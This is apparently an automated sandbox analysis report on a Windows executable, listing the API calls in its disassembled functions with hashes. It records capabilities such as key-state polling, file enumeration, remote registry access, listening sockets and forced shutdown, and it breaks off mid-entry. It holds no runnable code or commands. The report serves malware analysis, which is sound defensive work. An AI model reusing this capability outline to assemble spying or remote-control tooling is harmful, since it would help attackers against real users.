• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: ca1d39e7c3dcd50cd69e0756345bcbe67b5e5b1012420fcf5cc1910ba9abc4c2
• Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
• Opcode Fuzzy Hash: ca1d39e7c3dcd50cd69e0756345bcbe67b5e5b1012420fcf5cc1910ba9abc4c2
• Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
• API String ID: 0-559809668
• Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
• Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
• Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
• Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0046F113
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F128
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F13F
                                                                                                                                                    • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                                                                                  • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                                  • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                  • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                                                                                                  • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                                                                                  • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                                                                                                  APIs
                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                                                                                  • __swprintf.LIBCMT ref: 0046A231
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                                                                                  • _memset.LIBCMT ref: 0046A2B2
                                                                                                                                                  • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                                                  • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                  • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                                                                                                  • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                                                                                  • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                                                                                                  APIs
                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00460097
                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00460102
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                  • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                  • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                                                                                                                                                  • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                                                                                                                                                  • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                                  • Opcode ID: eef4f06837c88c6333fe19f002081eafe954a4facf3daecfb412de137efda7e6
                                                                                                                                                  • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                                                                                                                                                  • Opcode Fuzzy Hash: eef4f06837c88c6333fe19f002081eafe954a4facf3daecfb412de137efda7e6
                                                                                                                                                  • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
• Sleep.KERNEL32(0000000A), ref: 0046F470
• _wcscmp.LIBCMT ref: 0046F484
• _wcscmp.LIBCMT ref: 0046F49F
• FindNextFileW.KERNEL32(?,?), ref: 0046F53D
• FindClose.KERNEL32(00000000), ref: 0046F553
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: __itow__swprintf
• String ID: 3cA$_A
• API String ID: 674341424-3480954128
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
  • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
  • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
• ExitWindowsEx.USER32(?,00000000), ref: 004651F9
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
• WSAGetLastError.WSOCK32(00000000), ref: 004762EB
• bind.WSOCK32(00000000,?,00000010), ref: 00476307
• listen.WSOCK32(00000000,00000005), ref: 00476316
• WSAGetLastError.WSOCK32(00000000), ref: 00476330
• closesocket.WSOCK32(00000000,00000000), ref: 00476344
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
• _memmove.LIBCMT ref: 00450258
• _memmove.LIBCMT ref: 0045036D
• _memmove.LIBCMT ref: 00450414
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                                                                                    • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ColorProc$LongWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3744519093-0
                                                                                                                                                  • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                  • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                                                                                                  • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                  • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 99427753-0
                                                                                                                                                  • Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                                                                                  • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                                                                                                  • Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
                                                                                                                                                  • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                  • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                  • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                                                                                                  • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                  • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                  • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                  • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                                                                                                  • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                  • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                                                                                                  APIs
                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                                                                                  • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                  • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                  • String ID: .lnk
                                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                                  • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                  • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                                                                                                  • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                  • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                                                                                  Memory Dump Source
